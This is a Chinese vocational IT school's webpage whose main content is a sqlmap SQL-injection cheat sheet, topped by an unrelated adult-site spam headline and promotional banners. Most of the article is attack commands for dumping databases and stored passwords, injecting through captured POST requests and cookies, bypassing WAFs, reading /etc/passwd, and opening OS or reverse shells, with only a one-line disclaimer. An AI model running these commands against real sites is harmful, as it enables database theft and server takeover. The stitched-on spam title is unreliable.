经典日韩成人网站在线观看,JAPANESE国产乱在线播放

不僅僅統(tǒng)招學(xué)歷喲

熱門專業(yè)！
大學(xué)校園！
就業(yè)保障！
拿學(xué)歷又能高薪就業(yè)，誰能不愛！

了解詳情>

鄭州北大青鳥翔天信鴿參加“安心學(xué)習(xí)·放心就業(yè)”公約簽約儀式

讓每一個家庭“安心”、“放心”

教學(xué)為本
師愛為魂
安心學(xué)習(xí)
放心就業(yè)

了解詳情>

深耕細(xì)作IT職業(yè)教育15載

青鳥之星教學(xué)質(zhì)量大獎
卓越風(fēng)云人物
北大青鳥中心理事會成員
七項榮耀載譽(yù)而行！

了解詳情>

我們教學(xué)怎么樣

實力見證
網(wǎng)絡(luò)組一等獎
網(wǎng)絡(luò)組二等獎
軟件組四等獎
200家校區(qū)脫穎而出！

了解更多>

北大青鳥職業(yè)IT20周年

重承諾
守信用
放心品牌
放心學(xué)習(xí)
靠靠譜譜好就業(yè)！

了解更多>

我命由我不由天

學(xué)個性的技術(shù)
做愛做的事
掙滿意的錢
衣食無憂
選擇寬且高大尚！

了解更多>

我們靠不靠譜

14年辦學(xué)
14年磨練
14年成長
14年探索
只為讓每個學(xué)員成材！

了解更多>

不打工也牛掰

好工作
好環(huán)境
高薪資
好課程
支持你成為有“錢”人！

了解更多>

學(xué)IT就讀北大青鳥

好工作
好未來
好老師
好課程
支持你成為受人尊敬的人！

一步一步解讀sqlmap是如何操作的

作者：北大青鳥添加時間：06-06 瀏覽次數(shù)：0

1. 基礎(chǔ)用法：

./sqlmap.py -u “注入地址” -v 1 –dbs // 列舉數(shù)據(jù)庫

./sqlmap.py -u “注入地址” -v 1 –current-db // 當(dāng)前數(shù)據(jù)庫

./sqlmap.py -u “注入地址” -v 1 –users // 列數(shù)據(jù)庫用戶

./sqlmap.py -u “注入地址” -v 1 –current-user // 當(dāng)前用戶

./sqlmap.py -u “注入地址” -v 1 –tables -D “數(shù)據(jù)庫” // 列舉數(shù)據(jù)庫的表名

./sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “數(shù)據(jù)庫” // 獲取表的列名

./sqlmap.py -u “注入地址” -v 1 –dump -C “字段,字段” -T “表名” -D “數(shù)據(jù)庫” // 獲取表中的數(shù)據(jù)，包含列

已經(jīng)開始拖庫了，SQLMAP是非常人性化的，它會將獲取的數(shù)據(jù)存儲sqlmap/output/中、、、

2. sqlmap post注入

我們在使用Sqlmap進(jìn)行post型注入時，

經(jīng)常會出現(xiàn)請求遺漏導(dǎo)致注入失敗的情況。

這里分享一個小技巧，即結(jié)合burpsuite來使用sqlmap，

用這種方法進(jìn)行post注入測試會更準(zhǔn)確，操作起來也非常容易。

1. 瀏覽器打開目標(biāo)地址http:// www，2cto，com /Login.asp

2. 配置burp代理(127.0.0.1:8080)以攔截請求

3. 點擊login表單的submit按鈕

4. 如下圖，這時候Burp會攔截到了我們的登錄POST請求

5. 把這個post請求復(fù)制為txt, 我這命名為search-test.txt 然后把它放至sqlmap目錄下

6. 運(yùn)行sqlmap并使用如下命令：

./sqlmap.py -r search-test.txt -p tfUPass

這里參數(shù)-r 是讓sqlmap加載我們的post請求rsearch-test.txt，

而-p 大家應(yīng)該比較熟悉，指定注入用的參數(shù)。

3，sqlmap cookies注入

sqlmap.py -u “http://127.0.0.1/base.php” –cookies “id=1″ –dbs –level 2

2. 默認(rèn)情況下SQLMAP只支持GET/POST參數(shù)的注入測試，但是當(dāng)使用–level 參數(shù)且數(shù)值>=2的時候也會檢查cookie時面的參數(shù)，當(dāng)>=3的時候?qū)z查User-agent和Referer，那么這就很簡單了，我們直接在原有的基礎(chǔ)上面加上 –level 2 即可

利用sqlmap cookies注入突破用戶登錄繼續(xù)注入

先把用戶登陸的cookie拿到吧，

在收藏夾添加一個鏈接cookies屬性：

名字自己取

javascript:alert(document.cookie)，，需要獲取當(dāng)前cookie的時候，

直接點一下這個鏈接，然后復(fù)制一下彈出對話框

里的cookie值就搞定了

sqlmap.py -u http://x.x.x.x/Down.aspx?tid=2 -p tid –dbms mssql –cookie=”info=username=test”

-p是指指定參數(shù)注入

4. sqlmap遇到url重寫的注入

哪里存在注入就加上 * 號

./sqlmap.py -u “http://www，cunlide，com/id1/1*/id2/2“

5.sqlmap 編碼繞waf注入

./sqlmap.py -u http://127.0.0.1/test.php?id=1 -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”

在sqlmap 的 tamper目錄下有很多space2morehash.py 編碼腳本自行加載

其他基礎(chǔ)：

sqlmap -u “http://url/news?id=1” –level=3 –smart –dbms “Mysql” –current-user #獲取當(dāng)前用戶名稱

sqlmap -u “http://www.xxoo.com/news?id=1” –level=3 –smart –dbms “Mysql” –current-db #獲取當(dāng)前數(shù)據(jù)庫名稱

sqlmap -u “http://www.xxoo.com/news?id=1” –level=3 –smart –dbms “Mysql”–tables -D “db_name” #列表名

sqlmap -u “http://url/news?id=1” –level=3 –smart –dbms “Mysql” –columns -T “tablename” users-D “db_name” -v 0 #列字段

sqlmap -u “http://url/news?id=1” –level=3 –smart –dbms “Mysql” –dump -C “column_name” -T “table_name” -D “db_name” -v 0 #獲取字段內(nèi)容

******************信息獲取******************

sqlmap -u “ –smart –dbms “Mysql” –users #列數(shù)據(jù)庫用戶 sqlmap -u “ –smart –dbms “Mysql” –dbs#列數(shù)據(jù)庫 sqlmap -u “ –smart –dbms “Mysql”–passwords #數(shù)據(jù)庫用戶密碼 sqlmap -u “ –smart –dbms “Mysql”–passwords-U root -v 0 #列出指定用戶數(shù)據(jù)庫密碼 sqlmap -u “ –smart –dbms “Mysql” –dump-all -v 0 #列出所有數(shù)據(jù)庫所有表

sqlmap -u “ –smart –dbms “Mysql”–privileges #查看權(quán)限 sqlmap -u “ –smart –dbms “Mysql”–privileges -U root #查看指定用戶權(quán)限 sqlmap -u “ –smart –dbms “Mysql” –is-dba -v 1 #是否是數(shù)據(jù)庫管理員 sqlmap -u “ –smart –dbms “Mysql” –roles #枚舉數(shù)據(jù)庫用戶角色 sqlmap -u “ –smart –dbms “Mysql”–udf-inject #導(dǎo)入用戶自定義函數(shù)（獲取系統(tǒng)權(quán)限�。�

sqlmap -u “ –smart –dbms “Mysql”–dump-all –exclude-sysdbs -v 0 #列出當(dāng)前庫所有表

sqlmap -u “ –smart –dbms “Mysql” –union-check #是否支持union 注入 sqlmap -u “ –smart –dbms “Mysql”–union-cols #union 查詢表記錄 sqlmap -u “ –smart –dbms “Mysql” –union-test #union 語句測試

sqlmap -u “ –smart –dbms “Mysql” –union-use –banner #采用union 注入 sqlmap -u “ –smart –dbms “Mysql”–union-test –union-tech orderby #union 配合 order by

sqlmap -u “ –smart –dbms “Mysql”–method “POST” — data “id=1&cat=2″ #post注入 sqlmap -u “ –smart –dbms “Mysql”–cookie “COOKIE_VALUE” #cookie注入

sqlmap -u “ –smart –dbms “Mysql”-b #獲取banner信息

sqlmap -u “http://url/news?id=1” –level=3 –smart-v 1 -f #指紋判別數(shù)據(jù)庫類型

sqlmap -u “http://url/news?id=1” –level=3 –smart–proxy”http://127.0.0.1:8118” #代理注入

sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE“ #指定關(guān)鍵詞

sqlmap -u “ –smart –dbms “Mysql”–sql-shell #執(zhí)行指定sql命令

sqlmap -u “ –smart –dbms “Mysql”–file /etc/passwd sqlmap -u “ –smart –dbms “Mysql”–os-cmd=whoami #執(zhí)行系統(tǒng)命令 sqlmap -u “ –smart –dbms “Mysql”–os-shell #系統(tǒng)交互shell sqlmap -u “ –smart –dbms “Mysql”–os-pwn #反彈shell sqlmap -u “ –smart –dbms “Mysql”–reg-read #讀取win系統(tǒng)注冊表 sqlmap -u “ –smart –dbms “Mysql” –dbs-o “sqlmap.log” #保存進(jìn)度 sqlmap -u “ –smart –dbms “Mysql” –dbs -o “sqlmap.log” –resume #恢復(fù)已保存進(jìn)度

文章來自于網(wǎng)絡(luò)，請勿用于非法途徑，僅提供參考！

本文由站河南北大青鳥校區(qū)整編而成，如需了解更多IT資訊類的文章、新聞、課程和學(xué)習(xí)技巧、就業(yè)案例、招生詳情等問題，可以對在線咨詢老師進(jìn)行一對一問答！